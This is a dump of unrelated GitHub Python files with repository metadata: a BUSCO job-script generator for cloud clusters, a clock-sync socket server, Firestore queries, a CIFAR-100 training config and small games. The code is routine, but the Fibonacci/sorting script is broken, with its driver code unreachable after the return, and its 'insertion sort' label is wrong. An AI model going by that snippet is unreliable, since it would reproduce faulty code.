try:\n if not os.path.exists(os.path.dirname(get_busco_process_script())):\n os.makedirs(os.path.dirname(get_busco_process_script()))\n with open(get_busco_process_script(), mode='w', encoding='iso-8859-1', newline='\\n') as script_file_id:\n script_file_id.write( '#!/bin/bash\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 
'SEP=\"#########################################\"\\n')\n script_file_id.write( 'export HOST_IP=`curl --silent checkip.amazonaws.com`\\n')\n script_file_id.write( 'export HOST_ADDRESS=\"ec2-${HOST_IP//./-}-compute-1.amazonaws.com\"\\n')\n script_file_id.write( 'export AWS_CONFIG_FILE=/home/ubuntu/.aws/config\\n')\n script_file_id.write( 'export AWS_SHARED_CREDENTIALS_FILE=/home/ubuntu/.aws/credentials\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write(f'MINICONDA3_BIN_PATH={xlib.get_cluster_app_dir()}/{xlib.get_miniconda3_name()}/bin\\n')\n script_file_id.write(f'export PATH=$MINICONDA3_BIN_PATH:$PATH\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write(f'STATUS_DIR={xlib.get_status_dir(current_run_dir)}\\n')\n script_file_id.write(f'SCRIPT_STATUS_OK={xlib.get_status_ok(current_run_dir)}\\n')\n script_file_id.write(f'SCRIPT_STATUS_WRONG={xlib.get_status_wrong(current_run_dir)}\\n')\n script_file_id.write( 'mkdir --parents $STATUS_DIR\\n')\n script_file_id.write( 'if [ -f $SCRIPT_STATUS_OK ]; then rm $SCRIPT_STATUS_OK; fi\\n')\n script_file_id.write( 'if [ -f $SCRIPT_STATUS_WRONG ]; then rm $SCRIPT_STATUS_WRONG; fi\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write(f'CURRENT_DIR={current_run_dir}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function init\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' INIT_DATETIME=`date --utc +%s`\\n')\n script_file_id.write( ' FORMATTED_INIT_DATETIME=`date --date=\"@$INIT_DATETIME\" \"+%Y-%m-%d %H:%M:%S\"`\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Script started at $FORMATTED_INIT_DATETIME+00:00.\"\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write(f' echo \"CLUSTER: {cluster_name}\"\\n')\n script_file_id.write( ' echo \"HOST NAME: $HOSTNAME\"\\n')\n script_file_id.write( ' echo \"HOST IP: $HOST_IP\"\\n')\n script_file_id.write( ' echo \"HOST ADDRESS: $HOST_ADDRESS\"\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function download_lineage_data\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' cd $CURRENT_DIR\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Downloading lineage data ...\"\\n')\n download_script = f'import requests; r = requests.get(\\'{lineage_data_url}\\') ; open(\\'{lineage_data_file}\\' , \\'wb\\').write(r.content)'\n script_file_id.write(f' $MINICONDA3_BIN_PATH/python3 -c \"{download_script}\"\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error download_script $RC; fi\\n')\n script_file_id.write(f' tar -xzvf ./{lineage_data_file}\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error tar $RC; fi\\n')\n script_file_id.write(f' rm ./{lineage_data_file}\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error rm $RC; fi\\n')\n script_file_id.write( ' echo \"Lineage data are downloaded.\"\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( 
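The download step above hides a requests call inside a shell-escaped one-liner. Unescaped, and with the default lineage URL from the config template filled in, the generated step amounts to:

import requests

# Default from the config template; the real value is read from the config file.
lineage_data_url = 'https://busco-data.ezlab.org/v4/data/lineages/viridiplantae_odb10.2020-09-10.tar.gz'
lineage_data_file = lineage_data_url.split('/')[-1]  # viridiplantae_odb10.2020-09-10.tar.gz

r = requests.get(lineage_data_url)
open(lineage_data_file, 'wb').write(r.content)
# ...after which the script runs: tar -xzvf <lineage_data_file> && rm <lineage_data_file>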
'#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function run_busco_process\\n')\n script_file_id.write( '{\\n')\n script_file_id.write(f' source activate {xlib.get_busco_anaconda_code()}\\n')\n script_file_id.write( ' cd $CURRENT_DIR\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Assessing the transcriptome quality ...\"\\n')\n script_file_id.write( ' /usr/bin/time \\\\\\n')\n script_file_id.write(f' --format=\"{xlib.get_time_output_format(separator=False)}\" \\\\\\n')\n script_file_id.write( ' busco \\\\\\n')\n script_file_id.write(f' --cpu={ncpu} \\\\\\n')\n script_file_id.write(f' --lineage_dataset=./{lineage_data} \\\\\\n')\n script_file_id.write(f' --mode={mode} \\\\\\n')\n script_file_id.write(f' --evalue={evalue} \\\\\\n')\n script_file_id.write(f' --limit={limit} \\\\\\n')\n if species.upper() != 'NONE':\n script_file_id.write(f' --species={species} \\\\\\n')\n if long == 'YES':\n script_file_id.write( ' --long \\\\\\n')\n if augustus_options.upper() != 'NONE':\n script_file_id.write(f' --august_options=\"{augustus_options}\" \\\\\\n')\n script_file_id.write(f' --in={transcriptome_file} \\\\\\n')\n script_file_id.write(f' --out={os.path.basename(current_run_dir)}\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error run_BUSCO.py $RC; fi\\n')\n script_file_id.write( ' echo \"The assessment is done.\"\\n')\n script_file_id.write( ' conda deactivate\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function end\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' END_DATETIME=`date --utc +%s`\\n')\n script_file_id.write( ' FORMATTED_END_DATETIME=`date --date=\"@$END_DATETIME\" \"+%Y-%m-%d %H:%M:%S\"`\\n')\n script_file_id.write( ' calculate_duration\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Script ended OK at $FORMATTED_END_DATETIME+00:00 with a run duration of $DURATION s ($FORMATTED_DURATION).\"\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' send_mail ok\\n')\n script_file_id.write( ' touch $SCRIPT_STATUS_OK\\n')\n script_file_id.write( ' exit 0\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function manage_error\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' END_DATETIME=`date --utc +%s`\\n')\n script_file_id.write( ' FORMATTED_END_DATETIME=`date --date=\"@$END_DATETIME\" \"+%Y-%m-%d %H:%M:%S\"`\\n')\n script_file_id.write( ' calculate_duration\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"ERROR: $1 returned error $2\"\\n')\n script_file_id.write( ' echo \"Script ended WRONG at $FORMATTED_END_DATETIME+00:00 with a run duration of $DURATION s ($FORMATTED_DURATION).\"\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' send_mail wrong\\n')\n script_file_id.write( ' touch $SCRIPT_STATUS_WRONG\\n')\n script_file_id.write( ' exit 3\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n process_name = f'{xlib.get_busco_name()} process'\n mail_message_ok = xlib.get_mail_message_ok(process_name, cluster_name)\n mail_message_wrong = 
xlib.get_mail_message_wrong(process_name, cluster_name)\n script_file_id.write( 'function send_mail\\n')\n script_file_id.write( '{\\n')\n script_file_id.write(f' SUBJECT=\"{xlib.get_project_name()}: {process_name}\"\\n')\n script_file_id.write( ' if [ \"$1\" == \"ok\" ]; then\\n')\n script_file_id.write(f' MESSAGE=\"{mail_message_ok}\"\\n')\n script_file_id.write( ' elif [ \"$1\" == \"wrong\" ]; then\\n')\n script_file_id.write(f' MESSAGE=\"{mail_message_wrong}\"\\n')\n script_file_id.write( ' else\\n')\n script_file_id.write( ' MESSAGE=\"\"\\n')\n script_file_id.write( ' fi\\n')\n script_file_id.write( ' DESTINATION_FILE=mail-destination.json\\n')\n script_file_id.write( ' echo \"{\" > $DESTINATION_FILE\\n')\n script_file_id.write(f' echo \" \\\\\\\"ToAddresses\\\\\\\": [\\\\\\\"{xconfiguration.get_contact_data()}\\\\\\\"],\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"CcAddresses\\\\\\\": [],\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"BccAddresses\\\\\\\": []\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' echo \"}\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' MESSAGE_FILE=mail-message.json\\n')\n script_file_id.write( ' echo \"{\" > $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Subject\\\\\\\": {\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Data\\\\\\\": \\\\\\\"$SUBJECT\\\\\\\",\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Charset\\\\\\\": \\\\\\\"UTF-8\\\\\\\"\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" },\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Body\\\\\\\": {\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Html\\\\\\\": {\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Data\\\\\\\": \\\\\\\"$MESSAGE\\\\\\\",\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Charset\\\\\\\": \\\\\\\"UTF-8\\\\\\\"\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" }\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" }\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \"}\" >> $MESSAGE_FILE\\n')\n script_file_id.write(f' aws ses send-email --from {xconfiguration.get_contact_data()} --destination file://$DESTINATION_FILE --message file://$MESSAGE_FILE\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function calculate_duration\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' DURATION=`expr $END_DATETIME - $INIT_DATETIME`\\n')\n script_file_id.write( ' HH=`expr $DURATION / 3600`\\n')\n script_file_id.write( ' MM=`expr $DURATION % 3600 / 60`\\n')\n script_file_id.write( ' SS=`expr $DURATION % 60`\\n')\n script_file_id.write( ' FORMATTED_DURATION=`printf \"%03d:%02d:%02d\\\\n\" $HH $MM $SS`\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'init\\n')\n script_file_id.write( 'download_lineage_data\\n')\n script_file_id.write( 'run_busco_process\\n')\n script_file_id.write( 'end\\n')\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append(f'*** ERROR: The file {get_busco_process_script()} can not be created')\n OK = False\n\n # return the control variable and the error list\n return (OK, 
error_list)\n\n#-------------------------------------------------------------------------------\n\ndef build_busco_process_starter(current_run_dir):\n '''\n Build the starter of the current BUSCO process.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # write the BUSCO process starter\n try:\n if not os.path.exists(os.path.dirname(get_busco_process_starter())):\n os.makedirs(os.path.dirname(get_busco_process_starter()))\n with open(get_busco_process_starter(), mode='w', encoding='iso-8859-1', newline='\\n') as file_id:\n file_id.write( '#!/bin/bash\\n')\n file_id.write( '#-------------------------------------------------------------------------------\\n')\n file_id.write(f'{current_run_dir}/{os.path.basename(get_busco_process_script())} &>>{current_run_dir}/{xlib.get_cluster_log_file()}\\n')\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append(f'*** ERROR: The file {get_busco_process_starter()} can not be created')\n OK = False\n\n # return the control variable and the error list\n return (OK, error_list)\n\n#-------------------------------------------------------------------------------\n\ndef get_busco_config_file():\n '''\n Get the BUSCO config file path.\n '''\n\n # assign the BUSCO config file path\n busco_config_file = f'{xlib.get_config_dir()}/{xlib.get_busco_code()}-config.txt'\n\n # return the BUSCO config file path\n return busco_config_file\n\n#-------------------------------------------------------------------------------\n\ndef get_busco_process_script():\n '''\n Get the BUSCO process script path in the local computer.\n '''\n\n # assign the BUSCO script path\n busco_process_script = f'{xlib.get_temp_dir()}/{xlib.get_busco_code()}-process.sh'\n\n # return the BUSCO script path\n return busco_process_script\n\n#-------------------------------------------------------------------------------\n\ndef get_busco_process_starter():\n '''\n Get the BUSCO process starter path in the local computer.\n '''\n\n # assign the BUSCO process starter path\n busco_process_starter = f'{xlib.get_temp_dir()}/{xlib.get_busco_code()}-process-starter.sh'\n\n # return the BUSCO starter path\n return busco_process_starter\n\n#-------------------------------------------------------------------------------\n \ndef get_assembly_software_code_list():\n '''\n Get the code list of \"assembly_software\".\n '''\n\n return [xlib.get_soapdenovotrans_code(), xlib.get_transabyss_code(), xlib.get_trinity_code(), xlib.get_ggtrinity_code(), xlib.get_cd_hit_est_code(), xlib.get_transcript_filter_code()]\n\n#-------------------------------------------------------------------------------\n \ndef get_assembly_software_code_list_text():\n '''\n Get the code list of \"assembly_software\" as text.\n '''\n\n return f'{xlib.get_soapdenovotrans_code()} ({xlib.get_soapdenovotrans_name()}) or {xlib.get_transabyss_code()} ({xlib.get_transabyss_name()}) or {xlib.get_trinity_code()} ({xlib.get_trinity_name()}) or {xlib.get_ggtrinity_code()} ({xlib.get_ggtrinity_name()}) or {xlib.get_cd_hit_est_code()} ({xlib.get_cd_hit_est_name()}) or {xlib.get_transcript_filter_code()} ({xlib.get_transcript_filter_name()})'\n\n#-------------------------------------------------------------------------------\n \ndef get_mode_code_list():\n '''\n Get the code list of \"mode\".\n '''\n\n return ['GENO', 'TRAN', 'PROT']\n\n#-------------------------------------------------------------------------------\n \ndef get_mode_code_list_text():\n '''\n Get the code list of 
\"mode\".\n '''\n\n return 'GENO (genome assemblies, DNA) or TRAN (transcriptome assemblies, DNA) or PROT (annotated gene sets, proteins)'\n\n#-------------------------------------------------------------------------------\n \ndef get_long_code_list():\n '''\n Get the code list of \"long\".\n '''\n\n return ['YES', 'NO']\n\n#-------------------------------------------------------------------------------\n \ndef get_long_code_list_text():\n '''\n Get the code list of \"long\" as text.\n '''\n\n return str(get_long_code_list()).strip('[]').replace('\\'','').replace(',', ' or')\n\n#-------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n print('This file contains functions related to the BUSCO process used in both console mode and gui mode.')\n sys.exit(0)\n\n#-------------------------------------------------------------------------------\n","repo_name":"GGFHF/NGScloud2","sub_path":"Package/xbusco.py","file_name":"xbusco.py","file_ext":"py","file_size_in_byte":43029,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"8181794301","text":"import os, glob\n\n\n# Header:\ndata = \"# Tutorials\\n\"\n\ndata += \"\"\"\n> This section is purposed for local tutorial backup. \\\nTutorials divides into several section. find the links to\nthose sections.\n\n### Topic:\n\"\"\"\n\nfor dir in glob.glob(\".././tutorials/*\"):\n name = os.path.basename(dir)\n data += \"- [%s](./tutorials/%s/README.md)\\n\" % (name, name)\n\n\nwith open(\".././README.md\", \"w+\") as f:\n f.write(data)\n f.close()\n \n ","repo_name":"JunruTao/Peach","sub_path":"tutorials/scripts/configure_main_readme.py","file_name":"configure_main_readme.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7543809862","text":"# import socket programming library\nimport socket\nfrom _thread import *\nimport threading\nfrom random import randint\nimport time\n\n# Armazena relógio (em segundos). 
Funciona como uma variável global\nlocalTime = [time.time()]\n\n# Lista auxiliar que armazenará todos os relógios.\nremoteTimes = []\n\n# Lista que guardará todos os endereços e portas dos clientes.\nprocessos = []\n\n# Lock usado como semáforo para conexões\nprint_lock = threading.Lock()\n\n\n# Função que será usada em thread para coletar o relógio de um cliente\ndef coletarHorario(host, port):\n\t# Estabelece conexão com o cliente\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.connect((host,port))\n\n\t# Envia um requisito REQUEST_TIME\n\tprint(\"Enviando REQUEST_TIME para \" + str(host) + \":\" + str(port))\n\ts.send(\"REQUEST_TIME\\n\".encode())\n\n\t# Aguarda e recebe o relógio do cliente.\n\tdata = s.recv(1024).decode()\n\n\t# Encerra a conexão\n\ts.close()\n\n\t# Adiciona o relógio na lista remoteTimes (Que será usada para calcular média)\n\tremoteTimes.append(float(data))\n\n\n# Função que sera usada em thread para enviar o novo relógio\ndef enviarHorario(host, port, newTime):\n\t# Estabelece conexão com o cliente\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.connect((host,port))\n\n\t# Prepara mensagem ( transforma em string o relógio)\n\tmessage = str(newTime) + \"\\n\"\n\tprint(\"Enviando novo time para \" + str(host) + \":\" + str(port))\n\n\t# Envia mensagem e fecha conexão\n\ts.send(message.encode())\n\ts.close()\n\n\n# Função que será usada para processar o envio de temperatura de um cliente\ndef threaded(c):\n\t\n\t# Obtem a informação, libera o lock e fecha a conexão\n\tdata = c.recv(1024).decode()\n\t# data = c.recv(1024)\n\t#data = c.recv(1024)\n\tprint_lock.release()\n\tc.close()\n\n\tprint(\"Recebeu dado bruto: {}\".format(data))\n\n\t# Prepara a mensagem separando a temperatura do relógio\n\t# msg = ['TEMPERATURA','RELOGIO']\n\tmsg = data.split(\"@\")\n\n\tprint(\"Recebeu temperatura: {}\".format(msg[0]))\n\tprint(\"Recebeu timestamp: {:.2f}\".format(float(msg[1])))\n\n\t# Obtem a diferença entre o relógio local e o relógio do cliente\n\tdiff = float(localTime[0]) - float(msg[1])\n\t\n\t# Se a diferença for maior que 1, iniciar processo de atualização\n\tif (diff > 1 or diff < -1):\n\t\tprint(\"\\nDiferença de time: {}\".format(diff))\n\t\tprint(\"Discrepancia detectada.\\n\")\n\n\t\t# Limpa a lista remoteTimes que receberá os relógios de todos os processos.\n\t\tremoteTimes.clear()\n\n\t\t# Adiciona o relógio local ao remoteTimes\n\t\tremoteTimes.append(localTime[0])\n\n\t\t# Declara uma lista vazia my_threads que armazenara threads que serão executadas em breve\n\t\tmy_threads = []\n\n\t\t# Cria uma thread de requisição de relógio para cada cliente (Não executa ela ainda)\n\t\tfor processo in processos:\n\t\t\tmy_threads.append(threading.Thread(target=coletarHorario, args=(processo[0],processo[1],)))\n\n\t\t# Executa todas as threads\n\t\tfor thread in my_threads:\n\t\t\tthread.start()\n\t\t\n\t\t# Cria joins nas threads para que a execução só continue depois que todas as threads concluirem\n\t\tfor thread in my_threads:\n\t\t\tthread.join()\n\n\t\t# A esse ponto, o remoteTimes deveria ter todos os relógios dos processos\n\n\t\t# Calcular novo horario\n\t\tnewTime = sum(remoteTimes) / len(remoteTimes)\n\n\t\t# Atualiza relógio local\n\t\tlocalTime[0] = newTime\n\n\n\t\tprint(\"\\nNovo time que sera enviado: {:.2f}\\n\".format(newTime))\n\t\t\n\t\t# Enviar novo horario para os clientes\n\t\t# Esvazia o my_threads\n\t\tmy_threads = []\n\n\t\t# Prepara uma thread de envio de relógio para cada cliente (Não executa ela ainda)\n\t\tfor 
processo in processos:\n\t\t\tmy_threads.append(threading.Thread(target=enviarHorario, args=(processo[0],processo[1], newTime,)))\n\n\t\t# Executa todas as threads\n\t\tfor thread in my_threads:\n\t\t\tthread.start()\n\t\t\n\t\t# Cria joins nas threads para que a execução só continue depois que todas as threads concluirem\n\t\tfor thread in my_threads:\n\t\t\tthread.join()\n\n\t\t# Fim\n\telse:\n\t\tprint(\"\\nDiferença de time: {}\".format(diff))\n\t\tprint(\"Tudo OK.\\n\")\n\t\t\n\tprint()\n\t\n\n# Thread de clock do processo\ndef thread_clock():\n\tcount = 0.0\n\thz = 0.5\n\n\twhile True:\n\t\t\n\t\t# Aguarda 0.5 segundos\n\t\ttime.sleep(hz)\n\n\t\t# Adiciona 0.5 no relogio local e no counter\n\t\tlocalTime[0]+=hz\n\t\tcount += hz\n\n\t\t# Após 10 segundos, há 33% de chance de ser adicionado ou removido 2 segundos ao invez do padrao 0.5\n\t\tif (count > 10.0 and randint(0,2) == 0):\n\t\t\t\n\t\t\tcount = 0.0\n\n\t\t\tif (randint(0,1) == 0):\n\t\t\t\tlocalTime[0]+= 2.0\n\t\t\t\tprint(\"\\nANOMALIA OCORREU! +2 segundos!\\n\")\n\t\t\telse:\n\t\t\t\tlocalTime[0]-= 2.0\n\t\t\t\tprint(\"\\nANOMALIA OCORREU! -2 segundos!\\n\")\n\n \ndef Main():\n\n\t# Inicia a thread de clock que atuliza o relogio local\n\tstart_new_thread(thread_clock, ())\n\n\thost = \"\"\n\tport = 8000\n\n\t# Adiciona os endereços e portas de cada cliente à lista processos\n\tprocessos.append(['127.0.0.1',8001])\n\tprocessos.append(['127.0.0.1',8002])\n \n\t# Cria um socket para ouvir e receber envios de temperatura dos clientes\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.bind((host, port))\n\ts.listen(5)\n\tprint(\"Socket escutando, aguardando envios...\\n\")\n\n\t# Loop sem fim para receber envios de clientes\n\twhile True:\n \n\t\t# Estabelece conexao com cliente\n\t\tc, addr = s.accept()\n\t\tprint('Conectou a:', str(addr[0]) + ':' + str(addr[1]))\n \n\t\t# Obtem um lock para funcionar como semáforo\n\t\tprint_lock.acquire()\n\t\t\n\t\t# Inicia uma nova thread para tratar a conexão\n\t\tstart_new_thread(threaded, (c,))\n\n\ts.close()\n \n\nif __name__ == '__main__':\n\tMain()\n","repo_name":"brunoorlandin/clockSync","sub_path":"serverPython.py","file_name":"serverPython.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70420499607","text":"\"\"\"\nPrints the number of calls of a recursive Fibonacci\nfunction with problem sizes that double.\n\"\"\"\nimport math\nfrom math import *\nimport numpy as np\nimport random\nfrom collections import *\nfrom collections import Counter\ndef fib(n, counter):\n\t##Count the number of calls of the fibonacci function.##\n\tcounter.increment()\n\tif n < 3:\n\t\treturn 1\n\telse:\n\t\treturn fib(n - 1, counter) + fib(n - 2, counter)\n\tproblemSize = 2\n\tprint(\"%12s%15s\" % (\"ProblemSize\", \"Calls\"))\n\tfor count in range(5):\n\t\tcounter = Counter()\n\n\t\t# The start of the algorithm\n\t\tfib(problemSize, counter)\n\t\t# End of the algorithm\n\t\tprint(\"%12s%15s\" % (problemSize, counter))\n\t\tproblemSize *= 2\n\n\n# Insertion Sort Algorithm #\na = []\nfor i in range(20):\n\ta.append(random.randrange(1, 100, 1))\n\ta.sort()\n\tprint(a)","repo_name":"CLima86/CTCI_Rep","sub_path":"fund_python.py","file_name":"fund_python.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4057785061","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom 
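The resynchronization in threaded() above is the Berkeley algorithm in miniature: gather every clock (the server's included), average, and broadcast the result. Isolated, the arithmetic is just:

# Berkeley-style correction as performed above: remoteTimes starts with the
# server clock, coletarHorario appends one reading per client, and the new
# wall time is the plain mean of all of them.
def berkeley_average(local_clock, client_clocks):
    clocks = [local_clock] + client_clocks
    return sum(clocks) / len(clocks)

# e.g. berkeley_average(100.0, [97.5, 103.1])  ->  100.2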
firebase_admin import firestore\nimport logging\nimport urllib3\nfrom google.cloud.firestore_v1.base_query import BaseQuery\n\nhttp = urllib3.PoolManager()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\ncred = credentials.Certificate(\"./auth.json\")\nfirebase_admin.initialize_app(cred, {\n    'projectId': \"food-haccp\",\n})\ndb = firestore.client()\n\ndocs1 = db.collection(u'items')\\\n    .where(u'prdkind', u'==', u'커피')\\\n    .order_by(u'prdlstNm', direction=BaseQuery.ASCENDING)\\\n    .limit(10)\\\n    .stream()\n\nfor doc in docs1:\n    print(f'{doc.id} => {doc.to_dict()}')\n\nprint(\"--------------\")\n\n# Materialize the stream into a list so it can be reused after the loop below\ndocs2 = list(db.collection(u'items')\\\n    .where(u'prdkind', u'==', u'커피')\\\n    .order_by(u'prdlstNm', direction=BaseQuery.ASCENDING) \\\n    .limit(5) \\\n    .stream())\n\nfor doc in docs2:\n    print(f'{doc.id} => {doc.to_dict()}')\n\nprint(\"--------------\")\n\n# docs2 is a real list now; the previous list(docs2) was empty because the stream generator was already consumed above\nlast_doc = docs2[-1]\nlast_pop = last_doc.to_dict()[u'prdlstNm']\n\ndocs3 = db.collection(u'items')\\\n    .where(u'prdkind', u'==', u'커피')\\\n    .order_by(u'prdlstNm', direction=BaseQuery.ASCENDING)\\\n    .start_after({u'prdlstNm': last_pop})\\\n    .limit(5) \\\n    .stream()\n\nfor doc in docs3:\n    print(f'{doc.id} => {doc.to_dict()}')\n","repo_name":"pari0130/firebase-code","sub_path":"firebase-get-v1.py","file_name":"firebase-get-v1.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72887093847","text":"# File Name : cifar100_resnet.py\n# Purpose : Cifar100 training on tiles\n# Creation Date : 01-05-2022\n# Last Modified : \n# Created By : \n\nimport torch.nn as nn\nfrom torch import optim\nimport numpy as np\nimport torch\n\nfrom data_loader import get_dataloaders\nfrom models import resnet9, resnet_cifar\n\nfrom pytorch_trainer import Trainer\nfrom pytorch_trainer.metric import Accuracy\n\n### General hyper-parameters\ngeneral_options = {\n    'use_cuda' : True, # use GPU ?\n    'use_tensorboard' : True, # Use Tensorboard for saving hparams and metrics ?\n    'tensorboard_weight_hist': False # If save the histogram of model's weight at each epoch\n}\n\n### Training hyper-parameters\ntrainer_args = {\n    'epochs' : 400,\n    'loss_fn' : nn.CrossEntropyLoss, ## must be of type nn.Module\n    'optimizer' : optim.Adam,\n    'loss_fn_kwargs': {},\n    'optimizer_kwargs' : {'lr' : 0.002, 'weight_decay':1e-4},\n    'lr_scheduler' : optim.lr_scheduler.MultiStepLR, \n    'lr_scheduler_kwargs' : {'milestones':[40, 80, 100, 150, 200, 250, 300], 'gamma':0.5},\n    'metric': Accuracy, ## must be of type metric.Metric or its derived\n    'metric_kwargs': {},\n    'save_best' : True,\n    'save_location' : './saved_models',\n    'save_name' : 'cifar100_cropped_18_resnet9_2',\n    'continue_training_saved_model' : None,\n}\n\ndataloader_args = {\n    'dataset': 'cifar100',\n    'batch_size' : 256,\n    'shuffle' : True, \n    'num_workers': 12,\n    'crop_size': 18\n}\n\nnetwork_args = {\n    # 'pretrained': False,\n    'num_classes': 100,\n    'blocks':2,\n    'freeze_block1':None\n}\n\nexperiment_summary = 'Training resnet9 on 18x18 CIFAR-100 images 2nd run'\n\nif __name__ == '__main__':\n    trainer = Trainer('cifar100_cropped_18_resnet9_2', general_options, experiment_summary=experiment_summary)\n    trainer.initialize_dataloaders(get_dataloaders, **dataloader_args)\n    trainer.build_model(resnet9.IncrementalResnet9, **network_args)\n    #trainer.model.load_state_dict(torch.load('saved_models/cifar10_cropped_resnet_16_best.pth')['state_dict'])\n    # trainer.model.to(trainer.device)\n    
trainer.train(**trainer_args)\n","repo_name":"vamshichowdary/cod-cnn","sub_path":"tiled_training.py","file_name":"tiled_training.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43145359819","text":"import time\nfrom turtle import Screen\n\nfrom player import Player\nfrom score import Score\nfrom traffic import Traffic\nfrom display import Display\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\ngame_is_on = True\n\nplayer = Player()\nscore = Score()\ntraffic = Traffic()\ndisplay = Display()\n\nis_game_paused = False\n\n\ndef pause_game():\n global is_game_paused\n is_game_paused = not is_game_paused\n\n\nscreen.listen()\nscreen.onkey(key=\"Up\", fun=player.up)\nscreen.onkey(key=\"Down\", fun=player.down)\nscreen.onkey(key=\"Left\", fun=player.left_turn)\nscreen.onkey(key=\"Right\", fun=player.right_turn)\nscreen.onkey(key=\"space\", fun=pause_game)\n\n\nwhile game_is_on:\n\n if not is_game_paused:\n display.display_status(is_game_paused)\n time.sleep(0.1)\n screen.update()\n\n traffic.create_car()\n traffic.move_cars()\n\n # Detect Collision with Car\n for car in traffic.traffic_list:\n if car.distance(player) < 20:\n game_is_on = False\n score.show_game_over()\n\n # Detect Level Completion\n if player.ycor() > 250:\n score.increase_score()\n if score.level > score.highest_level:\n score.update_score()\n player.return_to_start()\n traffic.level_up()\n else:\n display.display_status(is_game_paused)\n\nscreen.exitonclick()\n","repo_name":"Ishan2608/Crossing-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2348031648","text":"import pygame\nfrom pygame.locals import *\nimport numpy as np\nimport os #Used for creating directories\nimport getpass #Used for getting the user's username, needed for choosing the directory of save files\nfrom 